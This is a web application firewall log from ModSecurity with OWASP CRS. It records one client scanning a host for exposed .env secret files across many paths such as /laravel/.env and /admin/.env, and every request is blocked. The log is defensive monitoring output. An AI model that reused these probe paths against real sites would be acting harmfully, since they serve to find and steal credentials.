[Thu Dec 18 03:27:44.490521 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlQAAAAE"]
[Thu Dec 18 03:27:44.549421 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlgAAAAE"]
[Thu Dec 18 03:27:44.549650 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlgAAAAE"]
[Thu Dec 18 03:27:44.549837 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlgAAAAE"]
[Thu Dec 18 03:27:44.611310 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlwAAAAE"]
[Thu Dec 18 03:27:44.611495 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlwAAAAE"]
[Thu Dec 18 03:27:44.611641 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlwAAAAE"]
[Thu Dec 18 03:27:44.682784 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLmAAAAAE"]
[Thu Dec 18 03:27:44.682987 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLmAAAAAE"]
[Thu Dec 18 03:27:44.683146 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLmAAAAAE"]
[Thu Dec 18 03:27:44.880068 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUNmoDZTDxRxH4PwP3Sg2QAAAAM"]
[Thu Dec 18 03:27:44.880300 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUNmoDZTDxRxH4PwP3Sg2QAAAAM"]
[Thu Dec 18 03:27:44.880461 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUNmoDZTDxRxH4PwP3Sg2QAAAAM"]
[Thu Dec 18 03:27:44.942011 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUNmoDZTDxRxH4PwP3Sg2gAAAAM"]
[Thu Dec 18 03:27:44.942225 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUNmoDZTDxRxH4PwP3Sg2gAAAAM"]
[Thu Dec 18 03:27:44.942400 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUNmoDZTDxRxH4PwP3Sg2gAAAAM"]
[Thu Dec 18 03:27:45.005189 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg2wAAAAM"]
[Thu Dec 18 03:27:45.005400 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg2wAAAAM"]
[Thu Dec 18 03:27:45.005568 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg2wAAAAM"]
[Thu Dec 18 03:27:45.090543 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3AAAAAM"]
[Thu Dec 18 03:27:45.090783 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3AAAAAM"]
[Thu Dec 18 03:27:45.090987 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3AAAAAM"]
[Thu Dec 18 03:27:45.162276 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3QAAAAM"]
[Thu Dec 18 03:27:45.162514 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3QAAAAM"]
[Thu Dec 18 03:27:45.162692 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3QAAAAM"]
[Thu Dec 18 03:27:45.234267 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3gAAAAM"]
[Thu Dec 18 03:27:45.234488 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3gAAAAM"]
[Thu Dec 18 03:27:45.234643 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3gAAAAM"]
[Thu Dec 18 03:27:45.304771 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3wAAAAM"]
[Thu Dec 18 03:27:45.304987 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3wAAAAM"]
[Thu Dec 18 03:27:45.305167 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg3wAAAAM"]
[Thu Dec 18 03:27:45.382713 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg4AAAAAM"]
[Thu Dec 18 03:27:45.382921 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg4AAAAAM"]
[Thu Dec 18 03:27:45.383100 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUNmoTZTDxRxH4PwP3Sg4AAAAAM"]
[Thu Dec 18 03:27:49.544151 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4QAAAAM"]
[Thu Dec 18 03:27:49.544379 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4QAAAAM"]
[Thu Dec 18 03:27:49.544574 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4QAAAAM"]
[Thu Dec 18 03:27:49.566166 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4gAAAAM"]
[Thu Dec 18 03:27:49.566371 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4gAAAAM"]
[Thu Dec 18 03:27:49.566514 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4gAAAAM"]
